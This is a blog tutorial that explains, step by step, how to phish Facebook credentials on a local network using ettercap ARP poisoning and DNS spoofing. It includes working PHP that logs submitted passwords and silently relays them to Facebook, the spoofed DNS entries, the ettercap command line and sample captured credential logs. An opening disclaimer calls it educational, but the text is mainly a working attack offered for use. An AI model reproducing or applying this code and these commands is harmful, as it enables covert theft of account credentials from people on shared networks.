//
you're reading...
Apache, howto, Linux, OpenSource, security

How Phishing Works along with Dns Spoofing

This is for Educational Purposes Only!!

This post describes how Phishing works. Many howtos exist on Internet but dont do the job silently

and the victim understands that something goes wrong …

Attacker’s Side

IP: 192.168.1.4

1. install ettercap

2. install Apache with php support

3. Make sure with ping command that facebook.com points to 192.168.1.4 or localhost

4. configure apache accordingly for virtualhosting and make sure that ServerName facebook.com

directive also exists in httpd.conf. The Apache Web server could run separately on another server.

5. create a php pass through page which will log the credentials of the user and then it

will forward seamlessly the https post request to facebook (without errors).

#- – – – – – – – – – – – – – – – – – – – PHP CODE – – – – – – – – – – – – – – – – – – – -#

<html>
<body>
<?
  $handle = fopen("log.txt", "a");
  $count=0;
  $usern="";
  $pass="";
  $track_time = date("F j, Y, g:i a");
  fwrite($handle, $track_time);
  fwrite($handle, "\r\n");
  foreach($_POST as $variable => $value) {
  fwrite($handle, $variable);
  fwrite($handle, "=");
  fwrite($handle, $value);
  fwrite($handle, "\r\n");
  if ($count==3) {$usern=$value;}
  if ($count==4) {$pass=$value;}
  $count++;
  }
 fwrite($handle, "\r\n");
 fclose($handle);
 echo "<form name=\"myform\" method=\"post\" action=\"https://www.facebook.com/login\
.php?login_attempt=1\">";
 echo "<input type=\"hidden\" name=\"email\" value=\"$usern\">";
 echo "<input type=\"hidden\" name=\"pass\" value=\"$pass\">";
?>
 <script language="JavaScript">document.myform.submit();</script>
</form>
</body>
</html>
#- - - - - - - - - - - - - - - - - - - - PHP CODE - - - - - - - - - - - - - - - - - - - -#

6. Go to facebook’s login page, then right click view the page source, copy the content of the page and then paste it using an editor in the Document root of Apache of facebook.com virtual host.

Replace

action=”https://www.facebook.com/login.php?login_attempt=1

with

action=”log_new.php”

Now, Save the file as index.html

7. Open ettercap’s etter.dns file and put the following entries ;
facebook.com      A   198.168.1.4      //spoofed record

http://www.facebook.com  A   66.220.153.15  //real record

8. Enable Ip forwarding & Launch ettercap using the dns spoof plugin
echo 1 > /proc/sys/net/ipv4/ip_forward

ettercap -TqM  arp:remote -P dns_spoof //

Victim’s Side

IP:192.168.1.5
When the victim(s) launch(es) the browser and enter(s) http://facebook.com the credentials will be logged in attacker’s log.txt (/var/www/log.txt)

root@pilio-laptop:/var/www# tail -f log.txt
March 3, 2011, 11:22

amcharset_test=€,´,€,´,水,Д,Є

lsd=x48vSlocale=en_US

email=xx.xxxxxxx@yahoo.com

pass=xxxxxxxxxxxx

persistent=1

default_persistent=1

Discussion

Comments are closed.